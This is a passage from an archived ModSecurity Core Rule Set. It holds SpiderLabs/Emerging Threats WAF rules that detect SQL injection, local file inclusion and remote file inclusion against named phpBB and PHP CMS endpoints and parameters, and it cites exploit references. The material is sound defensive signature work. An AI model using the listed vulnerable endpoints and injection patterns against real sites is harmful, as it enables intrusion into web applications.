"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005968,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UNION SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule ARGS:id "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2005969) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id INSERT SecRule REQUEST_LINE "@contains /admin/admin_acronyms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005969,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id INSERT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2005970) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id DELETE SecRule REQUEST_LINE "@contains /admin/admin_acronyms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005970,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id DELETE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2005971) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id ASCII SecRule REQUEST_LINE "@contains /admin/admin_acronyms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005971,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id ASCII',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule ARGS:id "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2005972) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UPDATE SecRule REQUEST_LINE "@contains /admin/admin_acronyms.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005972,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3033'" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB2 Plus SQL Injection Attempt -- admin_acronyms.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2006969) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id SELECT SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006969,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'" SecRule ARGS:hack_id "(?i:.+SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2006970) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UNION SELECT SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006970,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UNION SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'" SecRule ARGS:hack_id "(?i:.+UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2006971) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id INSERT SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006971,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id INSERT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'" SecRule ARGS:hack_id "(?i:.+INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2006972) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id DELETE SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006972,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id DELETE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'" SecRule ARGS:hack_id "(?i:.+DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2006973) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id ASCII SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006973,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id ASCII',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'" SecRule ARGS:hack_id "(?i:.+ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2006974) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UPDATE SecRule REQUEST_LINE "@contains /admin_hacks_list.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006974,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2851'" SecRule ARGS:hack_id "(?i:.+UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpBB SQL Injection Attempt -- admin_hacks_list.php hack_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2004606) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c SELECT SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004606,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'" SecRule ARGS:c "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2004607) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UNION SELECT SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004607,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UNION SELECT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'" SecRule ARGS:c "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2004608) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c INSERT SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004608,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c INSERT',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'" SecRule ARGS:c "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2004609) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c DELETE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004609,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c DELETE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'" SecRule ARGS:c "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2004610) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c ASCII SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004610,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c ASCII',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'" SecRule ARGS:c "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2004611) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004611,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4026'" SecRule ARGS:c "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 SQL Injection Attempt -- index.php c UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2009073) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_words.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009073,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2009074) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_groups_reapir.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009074,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" # (2009075) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_smilies.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009075,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/PHPBB-%{matched_var_name}=%{matched_var}'" SecMarker END_SLR_ET_PHPBB_RULES �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_rfi_attacks.conf�������0000664�0000000�0000000�00001656412�12164572564�0033075�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This ruleset was created by Trustwave SpiderLabs Research Team and includes data from: # # http://www.emergingthreats.net/ # SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_rfi.data" "id:'2000003',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_RFI_RULES" # (2011214) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ArdeaCore pathForArdeaCore Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /ardeaCore/lib/core/ardeaInit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011214,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ArdeaCore pathForArdeaCore Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,40811'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:pathForArdeaCore/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ArdeaCore pathForArdeaCore Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009717) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 1024 CMS standard.php page_include Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /layouts/standard.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009717,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS 1024 CMS standard.php page_include Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:page_include/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 1024 CMS standard.php page_include Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011164) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 29o3 CMS pageDescriptionObject.php LibDir Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/page/pageDescriptionObject.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011164,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS 29o3 CMS pageDescriptionObject.php LibDir Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'cve,2010-1922'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:LibDir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 29o3 CMS pageDescriptionObject.php LibDir Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011165) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 29o3 CMS layoutHeaderFuncs.php LibDir Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/layout/layoutHeaderFuncs.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011165,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS 29o3 CMS layoutHeaderFuncs.php LibDir Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,40049'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:LibDir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 29o3 CMS layoutHeaderFuncs.php LibDir Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011666) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 29o3 CMS layoutManager.php LibDir Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/layout/layoutManager.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011666,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS 29o3 CMS layoutManager.php LibDir Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,40049'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:LibDir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 29o3 CMS layoutManager.php LibDir Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011167) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 29o3 CMS layoutParser.php LibDir Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/layout/layoutParser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011167,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS 29o3 CMS layoutParser.php LibDir Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,40049'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:LibDir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 29o3 CMS layoutParser.php LibDir Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003704) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AForum Remote Inclusion func.php CommonAbsDir SecRule REQUEST_LINE "@contains /common/func.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003704,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS AForum Remote Inclusion func.php CommonAbsDir',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3884'" SecRule ARGS_NAMES "(?i:CommonAbsDir)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AForum Remote Inclusion func.php CommonAbsDir',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003736) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AForum Remote Inclusion Attempt -- errormsg.php header SecRule REQUEST_LINE "@contains /common/errormsg.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003736,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS AForum Remote Inclusion Attempt -- errormsg.php header',tag:'web-application-attack',tag:'cve,CVE-2007-2634'" SecRule ARGS_NAMES "(?i:header)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AForum Remote Inclusion Attempt -- errormsg.php header',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010080) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible AIOCP cp_html2xhtmlbasic.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /public/code/cp_html2xhtmlbasic.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010080,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible AIOCP cp_html2xhtmlbasic.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/507030'" SecRule QUERY_STRING|REQUEST_BODY "(?i:\x2Ephp\x3F.{0,300}\x3D(http\x3A|ftp\x3A|https\x3A|ftps\x3A))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible AIOCP cp_html2xhtmlbasic.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2002901) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Aardvark Topsites PHP CONFIG PATH Remote File Include Attempt SecRule &TX:'/RFI.*ARGS:CONFIG[PATH]/' "@gt 0" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002901,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Aardvark Topsites PHP CONFIG PATH Remote File Include Attempt',tag:'web-application-attack',tag:'url,www.osvdb.org/25158'" SecRule &TX:'/RFI.*ARGS:CONFIG[PATH]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Aardvark Topsites PHP CONFIG PATH Remote File Include Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010354) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Achievo debugger.php config_atkroot parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /debugger.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010354,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Achievo debugger.php config_atkroot parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,36822'" SecRule &TX:'/RFI.*ARGS:config_atkroot/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Achievo debugger.php config_atkroot parameter Remote File Inclusion 